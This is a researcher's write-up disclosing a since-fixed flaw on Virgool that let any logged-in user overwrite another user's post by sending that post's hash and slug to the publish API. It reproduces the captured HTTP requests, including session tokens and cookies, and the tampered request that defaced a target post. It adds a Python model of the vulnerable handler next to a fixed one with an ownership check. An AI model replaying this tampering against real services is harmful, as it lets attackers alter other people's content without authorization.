0xEhsan
6 min read · 5 years ago

How was I able to edit any post on Virgool?

This post is about a vulnerability I discovered in Virgool; it has since been fixed.

I was going through Virgool's features and got to the part where you write a new post. As I started entering a title and some body text, I noticed the text next to the Virgool logo changing: after every few words, once I paused, it switched to "Saving..." and then to "Saved".

I realised that after every change to the post, Virgool sends the result to the server and stores it as a draft. I was curious to see what those real-time save requests looked like, so I captured one and examined it.

Request:

POST /api/v1.2/editor/draft HTTP/1.1
Host: virgool.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://virgool.io/d/pcoljm27ttep/edit
Content-Type: application/json;charset=utf-8
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczpcL1wvdmlyZ29vbC5pb1wvYXBpXC92MS4yXC9sb2dpbiIsImlhdCI6MTU2MzE5MjAzOSwiZXhwIjoxNTg2ODQ0MDM5LCJuYmYiOjE1NjMxOTIwMzksImp0aSI6InhjYlZBdkVuUGhiNzJWbjAiLCJzdWIiOjI2OTg5LCJwcnYiOiI4N2UwYWYxZWY5ZmQxNTgxMmZkZWM5NzE1M2ExNGUwYjA0NzU0NmFhIn0
X-XSRF-TOKEN: eyJpdiI6Imx1Unh5WThheVpQMklRSTJmRWtyMmc9PSIsInZhbHVlIjoiWEFRNHhMXC8yYVBwQkY2UUJqZzJRMjVCelBXK2hvWjdRVjdJUm5EbThxWHdZY0xQOVFheTFtVDRNREhTRmhkWkoiLCJtYWMiOiJmYWY2OThlODIxN2I3MTIzZWNkYjdlYjEwMDM2YjkwNDQxNWZiMDYyNWQzNTk5MmU0ZDg0MWExY2M5YTU2MzE4In0=
Content-Length: 204
DNT: 1
Connection: close
Cookie: PHPSESSID=8g3n4cpsnlgjdoi3jq3ftpjcqe; XSRF-TOKEN=eyJpdiI6Imx1Unh5WThheVpQMklRSTJmRWtyMmc9PSIsInZhbHVlIjoiWEFRNHhMXC8yYVBwQkY2UUJqZzJRMjVCelBXK2hvWjdRVjdJUm5EbThxWHdZY0xQOVFheTFtVDRNREhTRmhkWkoiLCJtYWMiOiJmYWY2OThlODIxN2I3MTIzZWNkYjdlYjEwMDM2YjkwNDQxNWZiMDYyNWQzNTk5MmU0ZDg0MWExY2M5YTU2MzE4In0%3D; vrgl_sess=eyJpdiI6ImZtUUVcL08rSGtYXC9MMExBc2hqWVg4Zz09IiwidmFsdWUiOiJKOERNM2w1NlM4WXdWU3huTVJEMzBlcWZBNFZacStqMnpTQ1RtSnR3VVVyWGtoTXQ4M3RXdUxJUDhneU5sVVpJIiwibWFjIjoiN2JhYzY3OTFlNGQ5NWY4YTE5MTNhMDc2ZjBiNDEzOTkzYTJmY2FmOTM0ZmEzNTIzY2U4YzlhMmQ0ZmNkMjRjNyJ9; rec=eyJpdiI6ImhKZCtHa1hMVHpiV2dvSERcLysrVk5nPT0iLCJ2YWx1ZSI6IlM0Tnh3RDdcL2VmZWgzeEhlNDVSNkpBPT0iLCJtYWMiOiJkYmVkMjY0ZDQ0NTYyOGY2NzBlNTMxMDAzZDIxNTgyMDIyZTEwYjMxOWM2NDk2MGI2YTcyOWM1YmU0MGU2ZjBiIn0%3D; _hp2_id.2248261963=%7B%22userId%22%3A%227281601450853186%22%2C%22pageviewId%22%3A%228971263574404344%22%2C%22sessionId%22%3A%224648087988148446%22%2C%22identity%22%3Anull%2C%22trackerVersion%22%3A%224.0%22%7D; auth_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczpcL1wvdmlyZ29vbC5pb1wvYXBpXC92MS4yXC9sb2dpbiIsImlhdCI6MTU2MzE5MjAzOSwiZXhwIjoxNTg2ODQ0MDM5LCJuYmYiOjE1NjMxOTIwMzksImp0aSI6InhjYlZBdkVuUGhiNzJWbjAiLCJzdWIiOjI2OTg5LCJwcnYiOiI4N2UwYWYxZWY5ZmQxNTgxMmZkZWM5NzE1M2ExNGUwYjA0NzU0NmFhIn0; jwts=eyJpdiI6ImdFTGU5K0NUYWRjZnhTV1M1cjhvWmc9PSIsInZhbHVlIjoiNWhKeFROdFhpYUFLNmtIU3NZVVZoNWNTQVp1c2U5Sk5oREorY1JYNkJlVk10OEp6UlgrMmQ4ZldPeXFqbTBqRiIsIm1hYyI6IjgwMjU5ZDYxMTQ1MDk1MTRhOGMzYTBiMDA5NTA4NGM1YTI1OGUyZGQ1ZDdlOTA5ZGM0MDEwZjkzMDVjYmQwN2IifQ%3D%3D; uid=yttbeijzgh5z; _vcfg=%7B%22tpcs_c%22%3A49%7D; __cfduid=de6fe6ac80c6fe23e181108c89940a6871563192046; nightmode={%22value%22:0%2C%22userMenu%22:0%2C%22active%22:0}; _hp2_ses_props.2248261963=%7B%22ts%22%3A1563215804535%2C%22d%22%3A%22virgool.io%22%2C%22h%22%3A%22%2F%22%7D; G38lFwkS5Dq=eyJpdiI6Ilh5bWRlODdUeVdTR0xBZUhkdEx0R0E9PSIsInZhbHVlIjoiOWt5dlVWOVwveXc4SzB2a1gyTDBiZm4xSU1aTnlINGVmcEZydkQ3dEF2Q2E2Y0Q5TjBnMFNoN2FUVXpVWFJXaXkiLCJtYWMiOiI4MWJkMWQ5Nzg1ZjFhNzMxYWQxNWQ1MGQyN2ZiYjJlMmI4MzVjNWM1MTY1ZDNkMWQxNGM5ZGUxZDE0NDAxZTI3In0%3D

{"post_id":"","hash":"pcoljm27ttep","title":"Hello World","tag":"","body":"<p class=\"md-block-unstyled\">Hello Virgool.io. Its a sample post. </p>","words_count":6,"og_description":"","primary_img":null}

Response:

HTTP/1.1 200 OK
Server: nginx/1.15.9
Date: Mon, 15 Jul 2019 18:58:56 GMT
Content-Type: application/json
Connection: close
Vary: Accept-Encoding
X-Powered-By: Virgool
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: no-cache, private
X-RateLimit-Limit: 1000
X-RateLimit-Remaining: 997
Set-Cookie: vrgl_sess=eyJpdiI6IndXalBmRGRZcFZHSXV4cis1V2VrUEE9PSIsInZhbHVlIjoidUFHTFlrcUJSNytjc3BcL0tIWEk5cGxQazE3b3BZZ25uRVRuVGdNQXZZWkJTSCtvUEJpTEcrNlFISSt4VjdrNnUiLCJtYWMiOiIxYjRhMmIyNWVlN2YzN2ViNzA0YjgwNWE5NjU1OTE0MzZkMzI1MzUzZThmMmMwYTE5YzFiNzc5MGU0NjQ5YTc2In0%3D; expires=Tue, 16-Jul-2019 18:50:28 GMT; Max-Age=86400; path=/; httponly
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Security-Policy: default-src 'self' files.virgool.io blob:; connect-src 'self' https://www.google-analytics.com stats.vstat.ir heapanalytics.com cdn.iframe.ly https://geoip-db.com; font-src 'self' data: https://virgool.io; img-src blob: data: https: 'self' files.virgool.io https://www.google-analytics.com; object-src 'self' virgool.io; media-src cdn.virgool.io; script-src 'self' blob: https://virgool.io 'unsafe-eval' 'unsafe-inline' www.googletagmanager.com https://www.google-analytics.com js-agent.newrelic.com stats.vstat.ir bam.eu01.nr-data.net heapanalytics.com cdn.iframe.ly https://cdn.iframe.ly https://geoip-db.com https: 'self'; style-src 'unsafe-inline' data: https: 'self'; frame-src 'self' cdn.iframe.ly https://cdn.iframe.ly chromenull: https: webviewprogressproxy: ; worker-src blob: 'self';
Strict-Transport-Security: max-age=15724800; includeSubDomains
Content-Length: 16

{"success":true}

The request sent its data as JSON, so I pretty-printed it to see it more clearly.

{
  "post_id": "",
  "hash": "pcoljm27ttep",
  "title": "Hello World",
  "tag": "",
  "body": "<p class=\"md-block-unstyled\">Hello Virgool.io. Its a sample post. </p>",
  "words_count": 6,
  "og_description": "",
  "primary_img": null
}

Among the submitted fields, hash caught my attention. On inspection I found that every post has an identifier which appears at the end of the post's link, for example the link below:

https://virgool.io/@virgool/آمار-بازدید-مطالب-من-در-سال-۹۷-ew5ikbzdsebt

So I started fuzzing hash, and the results were as follows:

123test ---> {"success":true,"statusCode":"200","data":{"hash":"123"}}
test ---> {"success":true,"statusCode":"200","data":{"hash":"test"}}
test ---> {"success":true}

I went to the drafts section, and the result looked like this.

In this first round of fuzzing I found that there is no control over the input at all! That meant I could create a draft with any identifier I chose.

But is the next step, publishing the post, the same?

I clicked on "write new post", entered a title and body, and clicked "publish".

Request:

POST /api/v1.2/editor/publish HTTP/1.1
Host: virgool.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://virgool.io/d/pcoljm27ttep/edit
Content-Type: application/json;charset=utf-8
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczpcL1wvdmlyZ29vbC5pb1wvYXBpXC92MS4yXC9sb2dpbiIsImlhdCI6MTU2MzE5MjAzOSwiZXhwIjoxNTg2ODQ0MDM5LCJuYmYiOjE1NjMxOTIwMzksImp0aSI6InhjYlZBdkVuUGhiNzJWbjAiLCJzdWIiOjI2OTg5LCJwcnYiOiI4N2UwYWYxZWY5ZmQxNTgxMmZkZWM5NzE1M2ExNGUwYjA0NzU0NmFhIn0
X-XSRF-TOKEN: eyJpdiI6InFZczd6VmduMzRka3Y5eVBZcVwvY3RnPT0iLCJ2YWx1ZSI6IlwvNUlCMlpLNG80Nm1TdHUzRlNZUXhlZjk1R2NSZHdmMURyXC8zaHdWbWg1S1FNVUlpUWhqc0ZxVlZWcnNMV0FkNSIsIm1hYyI6IjczOGYyMGUzMjkxODY2MTQ3ZmY5M2YzOWMxMDI3OGIzM2U2NDkyZTMxYTkwZGFmNWM0ODBmYTkxZGIxZGY1YjkifQ==
Content-Length: 833
DNT: 1
Connection: close
Cookie: PHPSESSID=8g3n4cpsnlgjdoi3jq3ftpjcqe; XSRF-TOKEN=eyJpdiI6InFZczd6VmduMzRka3Y5eVBZcVwvY3RnPT0iLCJ2YWx1ZSI6IlwvNUlCMlpLNG80Nm1TdHUzRlNZUXhlZjk1R2NSZHdmMURyXC8zaHdWbWg1S1FNVUlpUWhqc0ZxVlZWcnNMV0FkNSIsIm1hYyI6IjczOGYyMGUzMjkxODY2MTQ3ZmY5M2YzOWMxMDI3OGIzM2U2NDkyZTMxYTkwZGFmNWM0ODBmYTkxZGIxZGY1YjkifQ%3D%3D; vrgl_sess=eyJpdiI6Ik94VkV3MTlxSzF3bXJvR2gzNml3WVE9PSIsInZhbHVlIjoib2VQTTgzSERleXJXbHhnWDhjNlU5UnJ0XC9xYVVKYzhydVwvVDl3bEs0SENmNWFTZFwvY2ZkamE4ZnEzbm9yYmJXZyIsIm1hYyI6ImJjZTcyZTI4MmU4ZDk3OGM5MDFmYWI2MjgyNzQwNTM2NGYwNjY5OGU2M2QwNTM2ZThkMTk2ZjUzOWM3MWYxYzEifQ%3D%3D; rec=eyJpdiI6ImhKZCtHa1hMVHpiV2dvSERcLysrVk5nPT0iLCJ2YWx1ZSI6IlM0Tnh3RDdcL2VmZWgzeEhlNDVSNkpBPT0iLCJtYWMiOiJkYmVkMjY0ZDQ0NTYyOGY2NzBlNTMxMDAzZDIxNTgyMDIyZTEwYjMxOWM2NDk2MGI2YTcyOWM1YmU0MGU2ZjBiIn0%3D; _hp2_id.2248261963=%7B%22userId%22%3A%227281601450853186%22%2C%22pageviewId%22%3A%222141144530700276%22%2C%22sessionId%22%3A%221736030237244822%22%2C%22identity%22%3Anull%2C%22trackerVersion%22%3A%224.0%22%7D; auth_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczpcL1wvdmlyZ29vbC5pb1wvYXBpXC92MS4yXC9sb2dpbiIsImlhdCI6MTU2MzE5MjAzOSwiZXhwIjoxNTg2ODQ0MDM5LCJuYmYiOjE1NjMxOTIwMzksImp0aSI6InhjYlZBdkVuUGhiNzJWbjAiLCJzdWIiOjI2OTg5LCJwcnYiOiI4N2UwYWYxZWY5ZmQxNTgxMmZkZWM5NzE1M2ExNGUwYjA0NzU0NmFhIn0; jwts=eyJpdiI6ImdFTGU5K0NUYWRjZnhTV1M1cjhvWmc9PSIsInZhbHVlIjoiNWhKeFROdFhpYUFLNmtIU3NZVVZoNWNTQVp1c2U5Sk5oREorY1JYNkJlVk10OEp6UlgrMmQ4ZldPeXFqbTBqRiIsIm1hYyI6IjgwMjU5ZDYxMTQ1MDk1MTRhOGMzYTBiMDA5NTA4NGM1YTI1OGUyZGQ1ZDdlOTA5ZGM0MDEwZjkzMDVjYmQwN2IifQ%3D%3D; uid=yttbeijzgh5z; _vcfg=%7B%22tpcs_c%22%3A49%7D; __cfduid=de6fe6ac80c6fe23e181108c89940a6871563192046; nightmode={%22value%22:0%2C%22userMenu%22:0%2C%22active%22:0}; G38lFwkS5Dq=eyJpdiI6Ilh5bWRlODdUeVdTR0xBZUhkdEx0R0E9PSIsInZhbHVlIjoiOWt5dlVWOVwveXc4SzB2a1gyTDBiZm4xSU1aTnlINGVmcEZydkQ3dEF2Q2E2Y0Q5TjBnMFNoN2FUVXpVWFJXaXkiLCJtYWMiOiI4MWJkMWQ5Nzg1ZjFhNzMxYWQxNWQ1MGQyN2ZiYjJlMmI4MzVjNWM1MTY1ZDNkMWQxNGM5ZGUxZDE0NDAxZTI3In0%3D; _hp2_ses_props.2248261963=%7B%22r%22%3A%22https%3A%2F%2Fvirgool.io%2Fsearch%3Fq%3D%25D9%2588%25DB%258C%25D8%25B1%25DA%25AF%25D9%2588%25D9%2584%2B%25D8%25B3%25D8%25A7%25D9%2584%25D9%2587%2B%25D8%25B4%25D8%25AF%22%2C%22ts%22%3A1563219763200%2C%22d%22%3A%22virgool.io%22%2C%22h%22%3A%22%2F%40virgool_ir%22%7D

{"post_id":"","hash":"pcoljm27ttep","title":"Hello World","body":"<p class=\"md-block-unstyled\">Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>","slug":"hello-world","tag":"","words_count":6,"og_description":null,"primary_img":null}

Response:

HTTP/1.1 200 OK
Server: nginx/1.15.9
Date: Mon, 15 Jul 2019 20:00:49 GMT
Content-Type: application/json
Connection: close
Vary: Accept-Encoding
X-Powered-By: Virgool
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: no-cache, private
X-RateLimit-Limit: 1000
X-RateLimit-Remaining: 994
Set-Cookie: vrgl_sess=eyJpdiI6ImFPa01wQ2ZzWjRESHdoM1lkbEx2ZFE9PSIsInZhbHVlIjoiVzdlZU9oK1lENFZsOE9cL0NuNHVocVRyNWNaYWxGeUZuc203THpMa21YUDZLVFhxbGYxaDIwbzVHSlVwZWk4Z1wvIiwibWFjIjoiMDViMGZlNWVmYzNlMDFjMDI1ZDllZDBiZjI2ZDg0YmI4Y2FhZTViNDZlNWU4N2U4YjYzYThiY2MzNWJmMTc5MSJ9; expires=Tue, 16-Jul-2019 20:09:17 GMT; Max-Age=86400; path=/; httponly
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Security-Policy: default-src 'self' files.virgool.io blob:; connect-src 'self' https://www.google-analytics.com stats.vstat.ir heapanalytics.com cdn.iframe.ly https://geoip-db.com; font-src 'self' data: https://virgool.io; img-src blob: data: https: 'self' files.virgool.io https://www.google-analytics.com; object-src 'self' virgool.io; media-src cdn.virgool.io; script-src 'self' blob: https://virgool.io 'unsafe-eval' 'unsafe-inline' www.googletagmanager.com https://www.google-analytics.com js-agent.newrelic.com stats.vstat.ir bam.eu01.nr-data.net heapanalytics.com cdn.iframe.ly https://cdn.iframe.ly https://geoip-db.com https: 'self'; style-src 'unsafe-inline' data: https: 'self'; frame-src 'self' cdn.iframe.ly https://cdn.iframe.ly chromenull: https: webviewprogressproxy: ; worker-src blob: 'self';
Strict-Transport-Security: max-age=15724800; includeSubDomains
Content-Length: 190

{"success":"\u067e\u0633\u062a \u0634\u0645\u0627 \u0628\u0627 \u0645\u0648\u0641\u0642\u06cc\u062a \u0648\u06cc\u0631\u0627\u06cc\u0634 \u0634\u062f","post_slug":"hello-world-pcoljm27ttep"}

The post data was again sent as JSON, and the response returned a success message together with the post's address (slug).
I pretty-printed the submitted JSON and started examining it.

{
  "post_id": "",
  "hash": "pcoljm27ttep",
  "title": "Hello World",
  "body": "<p class=\"md-block-unstyled\">Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>",
  "slug": "hello-world-pcoljm27ttep",
  "tag": "",
  "words_count": 6,
  "og_description": null,
  "primary_img": null
}

I saw that besides hash, the slug value, i.e. the post's address, is also sent. Since fuzzing hash on the draft endpoint had shown me there is no control over the hash input, the following scenario came to mind :)

What if I send the hash and slug of another post? Will that post get edited, or will the server return an error?

So I changed the post content a little :), took the hash and slug of another post from its link, substituted them in, and sent the request.

Request:

POST /api/v1.2/editor/publish HTTP/1.1
Host: virgool.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://virgool.io/d/pcoljm27ttep/edit
Content-Type: application/json;charset=utf-8
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczpcL1wvdmlyZ29vbC5pb1wvYXBpXC92MS4yXC9sb2dpbiIsImlhdCI6MTU2MzE5MjAzOSwiZXhwIjoxNTg2ODQ0MDM5LCJuYmYiOjE1NjMxOTIwMzksImp0aSI6InhjYlZBdkVuUGhiNzJWbjAiLCJzdWIiOjI2OTg5LCJwcnYiOiI4N2UwYWYxZWY5ZmQxNTgxMmZkZWM5NzE1M2ExNGUwYjA0NzU0NmFhIn0
X-XSRF-TOKEN: eyJpdiI6InFZczd6VmduMzRka3Y5eVBZcVwvY3RnPT0iLCJ2YWx1ZSI6IlwvNUlCMlpLNG80Nm1TdHUzRlNZUXhlZjk1R2NSZHdmMURyXC8zaHdWbWg1S1FNVUlpUWhqc0ZxVlZWcnNMV0FkNSIsIm1hYyI6IjczOGYyMGUzMjkxODY2MTQ3ZmY5M2YzOWMxMDI3OGIzM2U2NDkyZTMxYTkwZGFmNWM0ODBmYTkxZGIxZGY1YjkifQ==
Content-Length: 833
DNT: 1
Connection: close
Cookie: PHPSESSID=8g3n4cpsnlgjdoi3jq3ftpjcqe; XSRF-TOKEN=eyJpdiI6InFZczd6VmduMzRka3Y5eVBZcVwvY3RnPT0iLCJ2YWx1ZSI6IlwvNUlCMlpLNG80Nm1TdHUzRlNZUXhlZjk1R2NSZHdmMURyXC8zaHdWbWg1S1FNVUlpUWhqc0ZxVlZWcnNMV0FkNSIsIm1hYyI6IjczOGYyMGUzMjkxODY2MTQ3ZmY5M2YzOWMxMDI3OGIzM2U2NDkyZTMxYTkwZGFmNWM0ODBmYTkxZGIxZGY1YjkifQ%3D%3D; vrgl_sess=eyJpdiI6Ik94VkV3MTlxSzF3bXJvR2gzNml3WVE9PSIsInZhbHVlIjoib2VQTTgzSERleXJXbHhnWDhjNlU5UnJ0XC9xYVVKYzhydVwvVDl3bEs0SENmNWFTZFwvY2ZkamE4ZnEzbm9yYmJXZyIsIm1hYyI6ImJjZTcyZTI4MmU4ZDk3OGM5MDFmYWI2MjgyNzQwNTM2NGYwNjY5OGU2M2QwNTM2ZThkMTk2ZjUzOWM3MWYxYzEifQ%3D%3D; rec=eyJpdiI6ImhKZCtHa1hMVHpiV2dvSERcLysrVk5nPT0iLCJ2YWx1ZSI6IlM0Tnh3RDdcL2VmZWgzeEhlNDVSNkpBPT0iLCJtYWMiOiJkYmVkMjY0ZDQ0NTYyOGY2NzBlNTMxMDAzZDIxNTgyMDIyZTEwYjMxOWM2NDk2MGI2YTcyOWM1YmU0MGU2ZjBiIn0%3D; _hp2_id.2248261963=%7B%22userId%22%3A%227281601450853186%22%2C%22pageviewId%22%3A%222141144530700276%22%2C%22sessionId%22%3A%221736030237244822%22%2C%22identity%22%3Anull%2C%22trackerVersion%22%3A%224.0%22%7D; auth_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczpcL1wvdmlyZ29vbC5pb1wvYXBpXC92MS4yXC9sb2dpbiIsImlhdCI6MTU2MzE5MjAzOSwiZXhwIjoxNTg2ODQ0MDM5LCJuYmYiOjE1NjMxOTIwMzksImp0aSI6InhjYlZBdkVuUGhiNzJWbjAiLCJzdWIiOjI2OTg5LCJwcnYiOiI4N2UwYWYxZWY5ZmQxNTgxMmZkZWM5NzE1M2ExNGUwYjA0NzU0NmFhIn0; jwts=eyJpdiI6ImdFTGU5K0NUYWRjZnhTV1M1cjhvWmc9PSIsInZhbHVlIjoiNWhKeFROdFhpYUFLNmtIU3NZVVZoNWNTQVp1c2U5Sk5oREorY1JYNkJlVk10OEp6UlgrMmQ4ZldPeXFqbTBqRiIsIm1hYyI6IjgwMjU5ZDYxMTQ1MDk1MTRhOGMzYTBiMDA5NTA4NGM1YTI1OGUyZGQ1ZDdlOTA5ZGM0MDEwZjkzMDVjYmQwN2IifQ%3D%3D; uid=yttbeijzgh5z; _vcfg=%7B%22tpcs_c%22%3A49%7D; __cfduid=de6fe6ac80c6fe23e181108c89940a6871563192046; nightmode={%22value%22:0%2C%22userMenu%22:0%2C%22active%22:0}; G38lFwkS5Dq=eyJpdiI6Ilh5bWRlODdUeVdTR0xBZUhkdEx0R0E9PSIsInZhbHVlIjoiOWt5dlVWOVwveXc4SzB2a1gyTDBiZm4xSU1aTnlINGVmcEZydkQ3dEF2Q2E2Y0Q5TjBnMFNoN2FUVXpVWFJXaXkiLCJtYWMiOiI4MWJkMWQ5Nzg1ZjFhNzMxYWQxNWQ1MGQyN2ZiYjJlMmI4MzVjNWM1MTY1ZDNkMWQxNGM5ZGUxZDE0NDAxZTI3In0%3D; _hp2_ses_props.2248261963=%7B%22r%22%3A%22https%3A%2F%2Fvirgool.io%2Fsearch%3Fq%3D%25D9%2588%25DB%258C%25D8%25B1%25DA%25AF%25D9%2588%25D9%2584%2B%25D8%25B3%25D8%25A7%25D9%2584%25D9%2587%2B%25D8%25B4%25D8%25AF%22%2C%22ts%22%3A1563219763200%2C%22d%22%3A%22virgool.io%22%2C%22h%22%3A%22%2F%40virgool_ir%22%7D

{"post_id":"","hash":"guqjcef3i4qy","title":"Pwn By 0xEhsan","body":"<p class=\"md-block-unstyled\"><b>This Post Is Pwn By 0xEhsan</b><img src='https://files.virgool.io/upload/users/9091/posts/avykxkqiq7t0/aggkngdczbfd.png'> <br>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>","slug":"test-guqjcef3i4qy","tag":"","words_count":91,"og_description":"","primary_img":null}

Response:

HTTP/1.1 200 OK
Server: nginx/1.15.9
Date: Fri, 12 Jul 2019 23:50:09 GMT
Content-Type: application/json
Connection: close
Vary: Accept-Encoding
X-Powered-By: Virgool
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: no-cache, private
X-RateLimit-Limit: 1000
X-RateLimit-Remaining: 998
Set-Cookie: vrgl_sess=eyJpdiI6Ikt0SXc1ZE5JZTlkMEJMNURQVCtKOEE9PSIsInZhbHVlIjoiQ2lwS1JSeUd5REdoVFg5VzZVcklBcUd3blFibFkyc0lhWGRxQU9aYWRHbFpuTklyMEdSN3I5Wm9DeXlxbTR2VCIsIm1hYyI6IjgxZGYxYmMyYmI5ZWJmMjRiZDlmOWIzM2M5MTQ5YzZlODk5MTAwZDg5MmY4MTJiOGI4ZTRkOWFkZTZjMTAyOWUifQ%3D%3D; expires=Tue, 16-Jul-2019 20:12:29 GMT; Max-Age=86400; path=/; httponly
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Security-Policy: default-src 'self' files.virgool.io blob:; connect-src 'self' https://www.google-analytics.com stats.vstat.ir heapanalytics.com cdn.iframe.ly https://geoip-db.com; font-src 'self' data: https://virgool.io; img-src blob: data: https: 'self' files.virgool.io https://www.google-analytics.com; object-src 'self' virgool.io; media-src cdn.virgool.io; script-src 'self' blob: https://virgool.io 'unsafe-eval' 'unsafe-inline' www.googletagmanager.com https://www.google-analytics.com js-agent.newrelic.com stats.vstat.ir bam.eu01.nr-data.net heapanalytics.com cdn.iframe.ly https://cdn.iframe.ly https://geoip-db.com https: 'self'; style-src 'unsafe-inline' data: https: 'self'; frame-src 'self' cdn.iframe.ly https://cdn.iframe.ly chromenull: https: webviewprogressproxy: ; worker-src blob: 'self';
Strict-Transport-Security: max-age=15724800; includeSubDomains
Content-Length: 183

{"success":"\u067e\u0633\u062a \u0634\u0645\u0627 \u0628\u0627 \u0645\u0648\u0641\u0642\u06cc\u062a \u0648\u06cc\u0631\u0627\u06cc\u0634 \u0634\u062f","post_slug":"test-guqjcef3i4qy"}

And boom!!!

The response was success, and I was stunned: it means there is no check on the hash input and the post I had targeted was changed. So I opened the post's link.


The result was as expected and the targeted post had been successfully changed. So, using this vulnerability, I could change any post on the Virgool site.
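As an added illustration (this is not Virgool's code), the following Python models the draft and publish endpoints from the write-up with an in-memory dictionary standing in for the database. The two post hashes are the ones from the captured requests; the owner ids 1001 and 2002, the post bodies and the function names are made up for the example. `publish_vulnerable` reproduces the behaviour described above (hash and slug used exactly as the client sent them), while `resolve_post` adds the ownership check both endpoints were missing, so `save_draft_fixed` rejects the fuzzed hashes and `publish_fixed` rejects the cross-user edit.

```python
import secrets
import string


def new_hash(length=12):
    """Server-minted post identifier, same shape as the 12-character hashes in the write-up."""
    alphabet = string.ascii_lowercase + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


def slugify(title, post_hash):
    """Build the public slug from the title plus the hash; the client's slug field is ignored."""
    words = "".join(c if c.isalnum() else " " for c in title.lower()).split()
    return "-".join(words) + "-" + post_hash


def sample_posts():
    # Constructed in-memory store: hashes are the two from the captured requests,
    # owner ids 1001 and 2002 and the bodies are made up for this example.
    return {
        "pcoljm27ttep": {"owner": 1001, "title": "Hello World",
                         "body": "<p>Hello Virgool.io</p>", "slug": "hello-world-pcoljm27ttep"},
        "guqjcef3i4qy": {"owner": 2002, "title": "Another user's post",
                         "body": "<p>original text</p>", "slug": "test-guqjcef3i4qy"},
    }


def publish_vulnerable(posts, user_id, payload):
    """Models the original behaviour: hash and slug are trusted as sent, so any
    authenticated user can overwrite any post simply by naming its hash."""
    post = posts.setdefault(payload["hash"], {"owner": user_id})
    post.update(title=payload["title"], body=payload["body"], slug=payload["slug"])
    return {"status": 200, "success": True, "post_slug": post["slug"]}


def resolve_post(posts, user_id, post_hash):
    """Shared by both fixed handlers. Returns (hash, post, error_response)."""
    if not post_hash:                          # new post: the server chooses the identifier
        post_hash = new_hash()
        return post_hash, posts.setdefault(post_hash, {"owner": user_id}), None
    post = posts.get(post_hash)
    if post is None:                           # unknown hash is not silently created
        return post_hash, None, {"status": 404, "error": "no such post"}
    if post["owner"] != user_id:               # the authorization check that was missing
        return post_hash, None, {"status": 403, "error": "post belongs to another user"}
    return post_hash, post, None


def save_draft_fixed(posts, user_id, payload):
    post_hash, post, err = resolve_post(posts, user_id, payload.get("hash", ""))
    if err:
        return err
    post.update(title=payload["title"], body=payload["body"], draft=True)
    return {"status": 200, "success": True, "data": {"hash": post_hash}}


def publish_fixed(posts, user_id, payload):
    post_hash, post, err = resolve_post(posts, user_id, payload.get("hash", ""))
    if err:
        return err
    post.update(title=payload["title"], body=payload["body"],
                slug=slugify(payload["title"], post_hash), draft=False)
    return {"status": 200, "success": True, "post_slug": post["slug"]}
```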

Link to the proof-of-concept video:

https://www.youtube.com/watch?v=CIE00HbDF1c


And finally, a special thanks to my dear Yashar Shahinzadeh for following up on this vulnerability, and to the Virgool team for their professional attitude and how quickly they fixed it.

I'm Ehsan, busy with programming and interested in web application security.